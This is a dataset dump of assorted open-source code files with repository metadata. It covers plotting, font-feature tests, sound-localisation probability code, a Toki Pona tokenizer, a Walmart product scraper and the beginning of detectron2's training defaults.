y = sp.ma.array(y, mask=[y < 0])
print(sum(y), sum(y < 0))
plt.scatter(x, y)
plt.title("Web traffic over the last month")
plt.xlabel("Time")
plt.ylabel("Hits/hour")
plt.xticks([w * 7 * 24 for w in [0, 1, 2, 3, 4]], ['week %i' % (w + 1) for w in
[0, 1, 2, 3, 4]])
plt.autoscale(tight=True)
plt.grid()
plt.savefig(os.path.join(CHART_DIR, "1400_01_01.png"))
# sp.savetxt(os.path.join("..", "web_traffic.tsv"),
# zip(x[~y.mask],y[~y.mask]), delimiter="\t", fmt="%i")
sp.savetxt(os.path.join(
DATA_DIR, "web_traffic.tsv"), list(zip(x, y)), delimiter="\t", fmt="%s")
| [
"bb@b.om"
] | bb@b.om |
19bc27f2d36f6218270c1f5123559fb259030256 | c924753b19bc892f9b756483f080cd8a69f22dec | /tests/test_unparse_sub.py | 314d51de3b294148efc0fee5782aec2767c3f5e2 | [
"BSD-3-Clause"
] | permissive | mbrukman/fontFeatures | 21a65190aea163174486d026627b7a87a2e3fa20 | 9c33517571d9870e536dea005f7387f52b3fc967 | refs/heads/master | 2023-03-07T02:41:37.527028 | 2021-02-16T22:45:47 | 2021-02-16T22:45:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,808 | py | from fontFeatures import Substitution, FontFeatures
from fontTools.ttLib import TTFont
from fontFeatures.ttLib.GSUBUnparser import GSUBUnparser
from fontFeatures.ttLib import unparseLanguageSystems
import pprint
import unittest
class TestUnparse(unittest.TestCase):
font = TTFont("fonts/Amiri-Regular.ttf")
lookups = font["GSUB"].table.LookupList.Lookup
ff = FontFeatures()
unparser = GSUBUnparser(font["GSUB"], ff, [])
def test_single(self):
g, _ = self.unparser.unparseLookup(self.lookups[1], 1) # part of locl
self.assertEqual(g.rules[0].asFea(), "sub period by period.ara;")
self.assertEqual(g.rules[1].asFea(), "sub guillemotleft by guillemotleft.ara;")
def test_ligature(self):
g, _ = self.unparser.unparseLookup(self.lookups[0], 0) # part of ccmp
self.assertEqual(g.rules[0].asFea(), "sub uni0627 uni065F by uni0673;")
def test_multiple(self):
g, _ = self.unparser.unparseLookup(self.lookups[10], 10)
self.assertEqual(g.rules[0].asFea(), "sub uni08B6 by uni0628 smallmeem.above;")
def test_ignore(self):
g, _ = self.unparser.unparseLookup(self.lookups[48], 48)
self.assertEqual(
g.rules[0].asFea(),
"ignore sub [uni0622 uni0627 uni0648 uni0671 uni0627.fina uni0671.fina] uni0644.init' uni0644.medi' [uni0647.fina uni06C1.fina];",
)
def test_chaining(self):
self.unparser.unparseLookups()
g, _ = self.unparser.unparseLookup(
self.lookups[33], 33
) # part of calt in quran.fea
self.unparser.resolve_routine(g)
self.assertEqual(
g.rules[0].asFea(),
"sub uni0644' lookup SingleSubstitution32 uni0621' lookup SingleSubstitution31 uni0627' lookup SingleSubstitution32;",
)
| [
"simon@simon-cozens.org"
] | simon@simon-cozens.org |
10c6776be69dea31de3ce3a5be4102f89e22cf73 | f9a2e67dd2f40b37d8ff81bf6cdce47c38d2dee4 | /.c9/metadata/environment/clean_architecture/clean_architecture_resources/fb_post_clean_arch/views/create_comment/tests/test_case_01.py | 1962727c033f485ecf40d3db6f262ace0d0d43ce | [] | no_license | mohan277/backend_repo | 4eae065cf0fffa29866a2b549028cb8df4c97643 | 25dbb4d0f1c174b6da95f4c73737e49db9978429 | refs/heads/master | 2022-11-13T00:08:37.600743 | 2020-07-09T04:36:44 | 2020-07-09T04:36:44 | 278,259,585 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,447 | py | {"filter":false,"title":"test_case_01.py","tooltip":"/clean_architecture/clean_architecture_resources/fb_post_clean_arch/views/create_comment/tests/test_case_01.py","undoManager":{"mark":9,"position":9,"stack":[[{"start":{"row":37,"column":0},"end":{"row":37,"column":4},"action":"insert","lines":[" "],"id":2}],[{"start":{"row":37,"column":4},"end":{"row":37,"column":8},"action":"insert","lines":[" "],"id":3}],[{"start":{"row":37,"column":8},"end":{"row":37,"column":9},"action":"insert","lines":["p"],"id":4},{"start":{"row":37,"column":9},"end":{"row":37,"column":10},"action":"insert","lines":["r"]},{"start":{"row":37,"column":10},"end":{"row":37,"column":11},"action":"insert","lines":["i"]},{"start":{"row":37,"column":11},"end":{"row":37,"column":12},"action":"insert","lines":["n"]},{"start":{"row":37,"column":12},"end":{"row":37,"column":13},"action":"insert","lines":["t"]}],[{"start":{"row":37,"column":13},"end":{"row":37,"column":15},"action":"insert","lines":["()"],"id":5}],[{"start":{"row":37,"column":14},"end":{"row":37,"column":15},"action":"insert","lines":["s"],"id":6},{"start":{"row":37,"column":15},"end":{"row":37,"column":16},"action":"insert","lines":["e"]},{"start":{"row":37,"column":16},"end":{"row":37,"column":17},"action":"insert","lines":["l"]},{"start":{"row":37,"column":17},"end":{"row":37,"column":18},"action":"insert","lines":["f"]},{"start":{"row":37,"column":18},"end":{"row":37,"column":19},"action":"insert","lines":["."]},{"start":{"row":37,"column":19},"end":{"row":37,"column":20},"action":"insert","lines":["f"]},{"start":{"row":37,"column":20},"end":{"row":37,"column":21},"action":"insert","lines":["o"]}],[{"start":{"row":37,"column":21},"end":{"row":37,"column":22},"action":"insert","lines":["o"],"id":7},{"start":{"row":37,"column":22},"end":{"row":37,"column":23},"action":"insert","lines":["u"]},{"start":{"row":37,"column":23},"end":{"row":37,"column":24},"action":"insert","lines":["s"]},{"start":{"row":37,"column":24},"end":{"row":37,"column":25},"action":"insert","lines":["e"]},{"start":{"row":37,"column":25},"end":{"row":37,"column":26},"action":"insert","lines":["r"]}],[{"start":{"row":37,"column":22},"end":{"row":37,"column":23},"action":"insert","lines":["_"],"id":8}],[{"start":{"row":37,"column":28},"end":{"row":38,"column":0},"action":"insert","lines":["",""],"id":9},{"start":{"row":38,"column":0},"end":{"row":38,"column":8},"action":"insert","lines":[" "]}],[{"start":{"row":38,"column":0},"end":{"row":38,"column":8},"action":"remove","lines":[" "],"id":10}],[{"start":{"row":44,"column":8},"end":{"row":44,"column":10},"action":"insert","lines":["# "],"id":11},{"start":{"row":46,"column":8},"end":{"row":46,"column":10},"action":"insert","lines":["# "]},{"start":{"row":48,"column":8},"end":{"row":48,"column":10},"action":"insert","lines":["# "]},{"start":{"row":50,"column":8},"end":{"row":50,"column":10},"action":"insert","lines":["# "]},{"start":{"row":52,"column":8},"end":{"row":52,"column":10},"action":"insert","lines":["# "]},{"start":{"row":53,"column":8},"end":{"row":53,"column":10},"action":"insert","lines":["# "]},{"start":{"row":54,"column":8},"end":{"row":54,"column":10},"action":"insert","lines":["# "]},{"start":{"row":55,"column":8},"end":{"row":55,"column":10},"action":"insert","lines":["# "]},{"start":{"row":57,"column":8},"end":{"row":57,"column":10},"action":"insert","lines":["# "]},{"start":{"row":58,"column":8},"end":{"row":58,"column":10},"action":"insert","lines":["# "]},{"start":{"row":59,"column":8},"end":{"row":59,"column":10},"action":"insert","lines":["# "]},{"start":{"row":60,"column":8},"end":{"row":60,"column":10},"action":"insert","lines":["# "]},{"start":{"row":61,"column":8},"end":{"row":61,"column":10},"action":"insert","lines":["# "]},{"start":{"row":62,"column":8},"end":{"row":62,"column":10},"action":"insert","lines":["# "]},{"start":{"row":63,"column":8},"end":{"row":63,"column":10},"action":"insert","lines":["# "]},{"start":{"row":64,"column":8},"end":{"row":64,"column":10},"action":"insert","lines":["# "]}]]},"ace":{"folds":[],"scrolltop":666.3999999906868,"scrollleft":0,"selection":{"start":{"row":65,"column":0},"end":{"row":65,"column":0},"isBackwards":false},"options":{"guessTabSize":true,"useWrapMode":false,"wrapToView":true},"firstLineState":{"row":15,"state":"start","mode":"ace/mode/python"}},"timestamp":1592906972810,"hash":"ce0920fecde91300d72a35401bc1c2c407132fa2"} | [
"senammohanakrishna@gmail.com"
] | senammohanakrishna@gmail.com |
3595f3dc264996d3f27dba5091335b3d7999d3c1 | 70fccf84f1f8dbca2d289e4c983a45b6d715f5df | /utils/prob.py | 912341c94261659e690a170ee4c042f344caaa69 | [] | no_license | SensorsAudioINI/SpikeSeparation | ca05b4e08e90127bf82226ebc4ba6d7a0618ec94 | 6807b0914d90f6ae66e550be9ad50483b9c3d983 | refs/heads/master | 2021-03-30T17:47:27.209746 | 2020-04-03T14:42:46 | 2020-04-03T14:42:46 | 122,992,649 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,844 | py | from __future__ import division
from scipy.stats import norm
import warnings
import numpy as np
import progressbar
from matplotlib import pyplot
index_angles_01 = np.array([[12, 0], [11, -30], [9, -90], [8, -60], [4, 60], [3, 90], [1, 30]])
index_angles_02 = np.array([[1, 30], [2, 60], [3, 90], [4, 120], [5, 150], [6, 180], [7, 210], [8, 240], [9, 270],
[10, 300], [11, 330], [12, 0]])
def get_estimates(itds, initial_estimate, transition_probabilities, itd_dict, prior, save_to_file=None, verbose=False):
"""Implements the basic probabilistic model.
Args:
:param itds: The itds as a numpy array, of dtype np.float32, in seconds.
:param initial_estimate: The initial estimate as numpy array of size num_possible_locations. Note that the array
should be a valid probability distribution, so should sum upto 1.
:param transition_probabilities: The transition probabilities, as a numpy 2D array. Again, the rows must be
valid probability distributions.
:param itd_dict: The itd mapping between the quantized itds and their indices in array format.
:param prior: The prior distributions, as numpy 2D array, rows should be valid probability distributions.
:param save_to_file: If not None, filename is expected, to which the estimates and argmax_estimates are saved.
:param verbose: If True, then a progressbar display of the progress will be displayed.
Returns:
:return: A tuple (estimates, argmax_estimates)
estimates: A numpy 2D array, with the probability estimates at every itd.
argmax_estimates: A numpy array, with the argmax of the probability estimate at every itd.
"""
localization_estimate = initial_estimate
num_itds = len(itds)
estimates = np.zeros(shape=(num_itds, prior.shape[0]), dtype=np.float32)
argmax_estimates = np.zeros(shape=num_itds, dtype=np.int32)
bar = progressbar.ProgressBar() if verbose else identity
for itd_idx, itd in bar(enumerate(itds)):
position_matrix = np.multiply(transition_probabilities, localization_estimate)
position_probability = np.sum(position_matrix, axis=1)
motion_probability = np.array([prior[idx][np.argmin(np.abs(itd_dict - itd))] for idx in range(prior.shape[0])])
probability_to_normalize = np.multiply(motion_probability, position_probability)
localization_estimate = probability_to_normalize / sum(probability_to_normalize)
estimates[itd_idx] = localization_estimate
argmax_estimates[itd_idx] = np.argmax(localization_estimate)
if np.isnan(np.sum(localization_estimate)):
warnings.warn('Something wrong with the estimate.')
if save_to_file is not None:
np.savez(save_to_file, estimates=estimates, argmax_estimates=argmax_estimates)
return np.array(estimates, dtype=np.float32), np.array(argmax_estimates, dtype=np.float)
def get_priors(itd_streams, max_itd=800e-6, num_bins=80, save_to_file=None):
"""Calculate prior distributions based on separated itd_streams.
Args:
:param itd_streams: A list of separated itd streams, one for each discrete location.
:param max_itd: The max_itd parameter for the itd algorithm, in seconds.
:param num_bins: The number of bins the itds are quantized into.
:param save_to_file: If not None, filename is expected, to which the prior distribution is saved.
Returns:
:return: The priors, a 2D numpy array, with each row corresponding to a location.
"""
priors = np.zeros(shape=(len(itd_streams), num_bins), dtype=np.float32)
for idx, itd_stream in enumerate(itd_streams):
hist = np.histogram(itd_stream, bins=num_bins, range=(-max_itd, max_itd))[0] / len(itd_stream)
priors[idx] = hist
if save_to_file is not None:
np.save(save_to_file, priors)
return priors
def get_transition_probabilities(index_angles=index_angles_01, sigma=5):
"""Get Gaussian transition probabilities based on angles and a given sigma.
Args:
:param index_angles: The list of tuples with location index and the corresponding angle.
:param sigma: The sigma for the Gaussian distributions.
Returns:
:return: A numpy 2D array.
"""
transition_probabilities = np.zeros(shape=(len(index_angles), len(index_angles)), dtype=np.float32)
angles_original = index_angles[:, 1]
angles = np.sort(angles_original)
for angle_index, index_angle in enumerate(index_angles):
mean = index_angle[1]
angle_distribution = norm(mean, sigma).pdf(angles)
angle_dict = {}
for idx, angle in enumerate(angles):
angle_dict[angle] = angle_distribution[idx]
angle_distribution = [angle_dict[angle] for angle in angles_original]
transition_probabilities[angle_index] = angle_distribution
return transition_probabilities
def moving_average(estimates, window_length=10):
"""Implements moving window average to smoothen the estimates.
Args:
:param estimates: The estimates from the probabilistic model.
:param window_length: The window length for the smoothing.
Returns:
:return: The smoothed estimates, as a numpy array.
"""
averaged_estimates = np.zeros_like(estimates)
for idx in range(len(estimates) - window_length + 1):
averaged_estimates[idx] = np.mean(estimates[idx:idx + window_length], axis=0)
for idx in range(len(estimates) - window_length + 1, len(estimates)):
averaged_estimates[idx] = averaged_estimates[len(estimates) - window_length]
return averaged_estimates
def identity(x):
return x
def get_kalman_estimates(itds, h_k=-178., r_k=210. ** 2, f_k=1., q_k=(0.05) ** 2,
init_state=np.array(0), init_var_state=np.array(0) ** 2,
version='basic', itd_shift=37.20):
itds = itds * 1e6 + itd_shift
estimates, variances = [], []
x_k_k = init_state
p_k_k = init_var_state
for itd in itds:
x_k_km = f_k * x_k_k
p_k_km = f_k * p_k_k * f_k + q_k
y_k = itd - h_k * x_k_km
s_k = r_k + h_k * p_k_km * h_k
k_k = p_k_km * h_k / s_k
x_k_k = x_k_km + k_k * y_k
p_k_k = p_k_km - k_k * h_k * p_k_km
y_k_k = itd - h_k * x_k_k
estimates.append(x_k_k)
variances.append(p_k_k)
return np.array(estimates), np.array(variances)
if __name__ == '__main__':
test_index_angles = np.array([[12, 0], [11, -30], [9, -90], [8, -60], [4, 60], [3, 90], [1, 30]])
test_transition_probabilities = get_transition_probabilities(test_index_angles, sigma=5)
pyplot.imshow(test_transition_probabilities, aspect='auto', interpolation='nearest')
pyplot.show()
print('Hello world, nothing to test for now.')
| [
"enea.ceolini@gmail.com"
] | enea.ceolini@gmail.com |
3eb61ccad91e5d6796d947549f7ec095b2ec06a7 | acb8e84e3b9c987fcab341f799f41d5a5ec4d587 | /langs/8/uov.py | fdf45423c372262f0f9bdaf23dd89445225841dd | [] | no_license | G4te-Keep3r/HowdyHackers | 46bfad63eafe5ac515da363e1c75fa6f4b9bca32 | fb6d391aaecb60ab5c4650d4ae2ddd599fd85db2 | refs/heads/master | 2020-08-01T12:08:10.782018 | 2016-11-13T20:45:50 | 2016-11-13T20:45:50 | 73,624,224 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | import sys
def printFunction(lineRemaining):
if lineRemaining[0] == '"' and lineRemaining[-1] == '"':
if len(lineRemaining) > 2:
#data to print
lineRemaining = lineRemaining[1:-1]
print ' '.join(lineRemaining)
else:
print
def main(fileName):
with open(fileName) as f:
for line in f:
data = line.split()
if data[0] == 'uOV':
printFunction(data[1:])
else:
print 'ERROR'
return
if __name__ == '__main__':
main(sys.argv[1]) | [
"juliettaylorswift@gmail.com"
] | juliettaylorswift@gmail.com |
8a76865e6a5cdbbe7fa9df6795eea725d172e6c9 | 1bbead5d97a279383ae9ae6e4ee70af5d69f1e92 | /tokipona1000/init_conll.py | e9dc534168a128e9f2bcd38130063f4255f8815c | [] | no_license | m-rey/tokipona-corpus-collection | de948540b5045477418b88b0fc9594794cb5f921 | fd8988273f6dfbdad4aaffc12447d0e63284e5d0 | refs/heads/main | 2023-09-05T01:33:39.482149 | 2021-11-20T17:55:34 | 2021-11-20T17:55:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 551 | py | from ilonimi.normalizer import Normalizer
from ilonimi.tokenizer import Tokenizer
def main():
normalizer = Normalizer()
tokenizer = Tokenizer()
with open('tokipona1000.txt') as f:
for i, x in enumerate(f):
x = x.strip()
x = normalizer(x)
x = tokenizer(x)
print('# {}: {}'.format(i + 1, x))
for k, w in enumerate(x.split()):
print('{} {} {} {} {}'.format(k + 1, w, 'X', '0', 'x'))
print('')
if __name__ == '__main__':
#main()
pass
| [
"nymwa0@gmail.com"
] | nymwa0@gmail.com |
730bd4b0df6459b044a7418ae3f0717c02a95a42 | 06bd2a6845afc7b5617602c796de7dedf15ddaf8 | /app/__init__.py | de3224552da192f1b39776d8ac450c412a085898 | [] | no_license | mathssiqueira/simple-landing | 4d94a548b84b3799475487bbbb75d4366b69b890 | ce528747b31ff30f9def15bc63530d281610bb2f | refs/heads/master | 2023-04-30T15:56:35.181783 | 2021-05-21T20:58:29 | 2021-05-21T20:58:29 | 369,647,666 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 115 | py | from flask import Flask
app = Flask(__name__)
app.config.from_object('config')
from app.controllers import routes | [
"root@localhost.localdomain"
] | root@localhost.localdomain |
acc4b47ecab5e6f2765e24d3ccdf1f6b96e4655a | a797793842f433251d2ab0bafb0ebe800b89a076 | /rulet.py | 8d79359d829dea8fd95428ecdf71213eb4e4120b | [] | no_license | irhadSaric/Instrukcije | b2f576bceb7e75f5fa65bfef99c9cde53d597b32 | 9ac8979b824babdeef3712ab9d23c764536d57b0 | refs/heads/master | 2020-09-28T09:00:08.389651 | 2020-02-01T20:33:59 | 2020-02-01T20:33:59 | 226,740,846 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 372 | py | import random
# hocu da igram 10000 puta rulet
# svaki od tih 10000 puta cu birati random broj na ruletu
# koja je vjrv da cu dobiti
# najveci na ruletu broj : 36
brojiPobjede = 0
for i in range(10000):
mojBroj = random.randint(0, 36)
ruletovBroj = random.randint(0, 36)
if mojBroj == ruletovBroj:
brojiPobjede += 1
print(brojiPobjede / 10000) | [
"irhad.saric@hotmail.com"
] | irhad.saric@hotmail.com |
7500539e4b77c87262170eb516cec1aceeee07e0 | f00ad57c98e554470a72511dda7a7bfd160aca19 | /linear_structure/stack/number_converter.py | c3c80bda42a7c14c042346c0ebb05009899d9057 | [] | no_license | fanzhangg/algorithm-problems | d60115210aaaffcd094b34b9db5b46dadf93fe9e | 43b111ad625f197ba0905abceab9ee4484284e08 | refs/heads/master | 2021-07-12T20:24:46.265700 | 2020-07-06T17:58:31 | 2020-07-06T17:58:31 | 171,220,135 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,684 | py | from stack import Stack
def dec_to_bin(num: int) -> str:
"""
Convert integer values into binary numbers
Algorithm: Divided By 2
- Start with an integer greater than 0
- Continuously divide the number by 2 and keep track of the reminder
- the reversed string of reminders is the binary string
i.e. The binary string of 233 is 11101001
1 | 233
0 | 116
0 | 58
1 | 29
0 | 14
1 | 7
1 | 3
1 | 1
0
"""
stack = Stack()
while num != 0:
reminder = num % 2
stack.push(reminder)
num = num // 2
bin_str = ""
while not stack.isempty():
bin_digit = stack.pop()
bin_str = "".join((bin_str, str(bin_digit)))
return bin_str
def dec_to_hex(num: int) -> str:
"""
Convert a decimal number to hexadecimal string
:param num: a decimal number
:return: a hexadecimal string (A for 10, B for 11, ...)
"""
stack = Stack()
hex_str = ""
digits = "0123456789ABCDEF"
while num != 0:
reminder = num % 16
stack.push(reminder)
num = num // 16
while not stack.isempty():
digit = stack.pop()
hex_str = "".join((hex_str, digits[digit]))
return hex_str
def dec_to_oct(num: int) -> str:
"""
Convert a decimal number to a octal string
"""
stack = Stack()
oct_str = ""
while num != 0:
reminder = num % 8
stack.push(reminder)
num = num // 8
while not stack.isempty():
digit = stack.pop()
oct_str = "".join((oct_str, str(digit)))
return oct_str
if __name__ == "__main__":
print(dec_to_oct(25))
print(dec_to_hex(256))
| [
"vanadiumzhang@gmail.com"
] | vanadiumzhang@gmail.com |
ec5f21317444f9e667374731636bce4592443ac0 | d55f8836d27dcbe56ce62623f1a69f33c0fd950d | /UpWork_Projects/andy_upwork/wallmart/wallmart/spiders/wmProducts.py | 3e363834991c938048b239d63a724da91334d921 | [
"MIT"
] | permissive | SurendraTamang/Web-Scrapping | f12f0f8fcb4b6186ecab38c8036181e4d1560bed | 2bb60cce9010b4b68f5c11bf295940832bb5df50 | refs/heads/master | 2022-11-11T10:32:31.405058 | 2020-06-17T19:34:33 | 2020-06-17T19:34:33 | 273,258,179 | 0 | 1 | null | 2020-06-18T14:20:43 | 2020-06-18T14:20:42 | null | UTF-8 | Python | false | false | 9,336 | py | # -*- coding: utf-8 -*-
import scrapy
from scrapy_selenium import SeleniumRequest
from scrapy import Selector
import time
import pandas as pd
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
class WmproductsSpider(scrapy.Spider):
name = 'wmProducts'
df = pd.read_excel("D:/sipun/Web-Scrapping/UpWork_Projects/andy_upwork/wallmart/links_main.xlsx", sheet_name='urls')
def start_requests(self):
yield SeleniumRequest(
url="https://www.walmart.com",
wait_time=6,
callback=self.parse
)
def parse(self, response):
driver = response.meta['driver']
for _, value in self.df.iterrows():
driver.get(value['url'])
time.sleep(2)
html = driver.page_source
resp_obj = Selector(text=html)
check1 = resp_obj.xpath("//div[@data-type='items']")
check2 = resp_obj.xpath("//span[text()='Shop by Category' or text()='Shop by category']/parent::span/parent::button/following-sibling::div/div/ul/li")
check3 = resp_obj.xpath("//h2[text()='Shop by category']/parent::div/parent::div/following-sibling::div//div[@class='TempoCategoryTile-tile valign-top']")
if check1:
cntr = 1
while True:
html = driver.page_source
resp_obj = Selector(text=html)
listings = resp_obj.xpath("//div[@data-type='items']")
for prods in listings:
product_url = f'''https://www.walmart.com{prods.xpath(".//div[@class='search-result-product-title gridview']/a/@href").get()}'''
product_name = prods.xpath("normalize-space(.//div[@class='search-result-product-title gridview']/a/span/text())").get()
price = prods.xpath("normalize-space(.//span[@class='price-main-block']/span/span/text())").get()
if not product_name :
product_url = f'''https://www.walmart.com{prods.xpath(".//span[text()='Product Title']/parent::div/a/@href").get()}'''
product_name = prods.xpath("normalize-space(.//span[text()='Product Title']/parent::div/a/span/text())").get()
if not price:
price = f'''{prods.xpath("normalize-space(.//span[@class='price price-main'][1]/span/text())").get()} - {prods.xpath("normalize-space(.//span[@class='price price-main'][2]/span/text())").get()}'''
yield {
'product_url': product_url,
'product_name': product_name,
'product_price': price,
'lvl1_cat': value['lvl1_cat'],
'lvl2_cat': value['lvl2_cat'],
'lvl3_cat': value['lvl3_cat'],
'lvl4_cat': None
}
next_page = resp_obj.xpath("//span[text()='Next Page']/parent::button")
cntr += 1
if next_page:
next_page = resp_obj.xpath(f"//ul[@class='paginator-list']/li/a[text()='{cntr}']/@href").get()
driver.get(f"https://www.walmart.com{next_page}")
time.sleep(2)
else:
break
elif check2:
driver.execute_script("window.open('');")
driver.switch_to.window(driver.window_handles[1])
for listings in check2:
lvl4_cat = listings.xpath(".//a/span/text()").get()
url = listings.xpath(".//a/@href").get()
driver.get(f"https://www.walmart.com{url}")
cntr = 1
while True:
html = driver.page_source
resp_obj = Selector(text=html)
listings = resp_obj.xpath("//div[@data-type='items']")
for prods in listings:
product_url = f'''https://www.walmart.com{prods.xpath(".//div[@class='search-result-product-title gridview']/a/@href").get()}'''
product_name = prods.xpath("normalize-space(.//div[@class='search-result-product-title gridview']/a/span/text())").get()
price = prods.xpath("normalize-space(.//span[@class='price-main-block']/span/span/text())").get()
if not product_name :
product_url = f'''https://www.walmart.com{prods.xpath(".//span[text()='Product Title']/parent::div/a/@href").get()}'''
product_name = prods.xpath("normalize-space(.//span[text()='Product Title']/parent::div/a/span/text())").get()
if not price:
price = f'''{prods.xpath("normalize-space(.//span[@class='price price-main'][1]/span/text())").get()} - {prods.xpath("normalize-space(.//span[@class='price price-main'][2]/span/text())").get()}'''
yield {
'product_url': product_url,
'product_name': product_name,
'product_price': price,
'lvl1_cat': value['lvl1_cat'],
'lvl2_cat': value['lvl2_cat'],
'lvl3_cat': value['lvl3_cat'],
'lvl4_cat': lvl4_cat
}
next_page = resp_obj.xpath("//span[text()='Next Page']/parent::button")
cntr += 1
if next_page:
next_page = resp_obj.xpath(f"//ul[@class='paginator-list']/li/a[text()='{cntr}']/@href").get()
driver.get(f"https://www.walmart.com{next_page}")
time.sleep(2)
else:
break
driver.close()
driver.switch_to.window(driver.window_handles[0])
elif check3:
driver.execute_script("window.open('');")
driver.switch_to.window(driver.window_handles[1])
for listings in check3:
lvl4_cat = listings.xpath(".//span/text()").get()
url = listings.xpath(".//following-sibling::a/@href").get()
driver.get(f"https://www.walmart.com{url}")
cntr = 1
while True:
html = driver.page_source
resp_obj = Selector(text=html)
listings = resp_obj.xpath("//div[@data-type='items']")
for prods in listings:
product_url = f'''https://www.walmart.com{prods.xpath(".//div[@class='search-result-product-title gridview']/a/@href").get()}'''
product_name = prods.xpath("normalize-space(.//div[@class='search-result-product-title gridview']/a/span/text())").get()
price = prods.xpath("normalize-space(.//span[@class='price-main-block']/span/span/text())").get()
if not product_name :
product_url = f'''https://www.walmart.com{prods.xpath(".//span[text()='Product Title']/parent::div/a/@href").get()}'''
product_name = prods.xpath("normalize-space(.//span[text()='Product Title']/parent::div/a/span/text())").get()
if not price:
price = f'''{prods.xpath("normalize-space(.//span[@class='price price-main'][1]/span/text())").get()} - {prods.xpath("normalize-space(.//span[@class='price price-main'][2]/span/text())").get()}'''
yield {
'product_url': product_url,
'product_name': product_name,
'product_price': price,
'lvl1_cat': value['lvl1_cat'],
'lvl2_cat': value['lvl2_cat'],
'lvl3_cat': value['lvl3_cat'],
'lvl4_cat': lvl4_cat
}
next_page = resp_obj.xpath("//span[text()='Next Page']/parent::button")
cntr += 1
if next_page:
next_page = resp_obj.xpath(f"//ul[@class='paginator-list']/li/a[text()='{cntr}']/@href").get()
driver.get(f"https://www.walmart.com{next_page}")
time.sleep(2)
else:
break
driver.close()
driver.switch_to.window(driver.window_handles[0])
else:
pass
| [
"p.byom26@gmail.com"
] | p.byom26@gmail.com |
21502344755f8261134442bd768bce21d57d2f29 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02389/s111149243.py | 819894f3d827de376038b5054bffcf2855fbd562 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 60 | py | a, b = map(int, input().split())
print(a * b, (a + b) << 1)
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
5c09566cc272f32a6131fcd7db6e831101f055f0 | add74ecbd87c711f1e10898f87ffd31bb39cc5d6 | /xcp2k/classes/_print13.py | a7e6fa4811794eca39b339bb74efedcf02cf7cbe | [] | no_license | superstar54/xcp2k | 82071e29613ccf58fc14e684154bb9392d00458b | e8afae2ccb4b777ddd3731fe99f451b56d416a83 | refs/heads/master | 2021-11-11T21:17:30.292500 | 2021-11-06T06:31:20 | 2021-11-06T06:31:20 | 62,589,715 | 8 | 2 | null | null | null | null | UTF-8 | Python | false | false | 709 | py | from xcp2k.inputsection import InputSection
from xcp2k.classes._program_run_info9 import _program_run_info9
from xcp2k.classes._temperature_colvar1 import _temperature_colvar1
from xcp2k.classes._colvar1 import _colvar1
from xcp2k.classes._hills1 import _hills1
class _print13(InputSection):
def __init__(self):
InputSection.__init__(self)
self.PROGRAM_RUN_INFO = _program_run_info9()
self.TEMPERATURE_COLVAR = _temperature_colvar1()
self.COLVAR = _colvar1()
self.HILLS = _hills1()
self._name = "PRINT"
self._subsections = {'PROGRAM_RUN_INFO': 'PROGRAM_RUN_INFO', 'TEMPERATURE_COLVAR': 'TEMPERATURE_COLVAR', 'COLVAR': 'COLVAR', 'HILLS': 'HILLS'}
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
e76b1d9bfb455dd5ac8a65e32ae019f5a20448aa | 3c9d06b1ebf289d5f22cfd53c35e3ea1e6500c36 | /detectron2/engine/defaults.py | 396943e06f4a3da4e44ff5a53a59418437a96fa3 | [
"Apache-2.0"
] | permissive | huangzehao/detectron2 | 2331115e6b6c4069a11c99fb5deec8073cf7442e | 2455e4790f470bba54299c049410fc0713ae7529 | refs/heads/master | 2021-06-27T19:46:05.908074 | 2021-04-05T17:32:46 | 2021-04-05T17:33:34 | 217,011,286 | 1 | 1 | Apache-2.0 | 2019-10-23T08:49:54 | 2019-10-23T08:49:54 | null | UTF-8 | Python | false | false | 24,859 | py | # -*- coding: utf-8 -*-
# Copyright (c) Facebook, Inc. and its affiliates.
"""
This file contains components with some default boilerplate logic user may need
in training / testing. They will not work for everyone, but many users may find them useful.
The behavior of functions/classes in this file is subject to change,
since they are meant to represent the "common default behavior" people need in their projects.
"""
import argparse
import logging
import os
import sys
from collections import OrderedDict
from typing import Optional
import torch
from fvcore.nn.precise_bn import get_bn_modules
from torch.nn.parallel import DistributedDataParallel
import detectron2.data.transforms as T
from detectron2.checkpoint import DetectionCheckpointer
from detectron2.data import (
MetadataCatalog,
build_detection_test_loader,
build_detection_train_loader,
)
from detectron2.evaluation import (
DatasetEvaluator,
inference_on_dataset,
print_csv_format,
verify_results,
)
from detectron2.modeling import build_model
from detectron2.solver import build_lr_scheduler, build_optimizer
from detectron2.utils import comm
from detectron2.utils.collect_env import collect_env_info
from detectron2.utils.env import TORCH_VERSION, seed_all_rng
from detectron2.utils.events import CommonMetricPrinter, JSONWriter, TensorboardXWriter
from detectron2.utils.file_io import PathManager
from detectron2.utils.logger import setup_logger
from . import hooks
from .train_loop import AMPTrainer, SimpleTrainer, TrainerBase
__all__ = [
"default_argument_parser",
"default_setup",
"default_writers",
"DefaultPredictor",
"DefaultTrainer",
]
def default_argument_parser(epilog=None):
"""
Create a parser with some common arguments used by detectron2 users.
Args:
epilog (str): epilog passed to ArgumentParser describing the usage.
Returns:
argparse.ArgumentParser:
"""
parser = argparse.ArgumentParser(
epilog=epilog
or f"""
Examples:
Run on single machine:
$ {sys.argv[0]} --num-gpus 8 --config-file cfg.yaml
Change some config options:
$ {sys.argv[0]} --config-file cfg.yaml MODEL.WEIGHTS /path/to/weight.pth SOLVER.BASE_LR 0.001
Run on multiple machines:
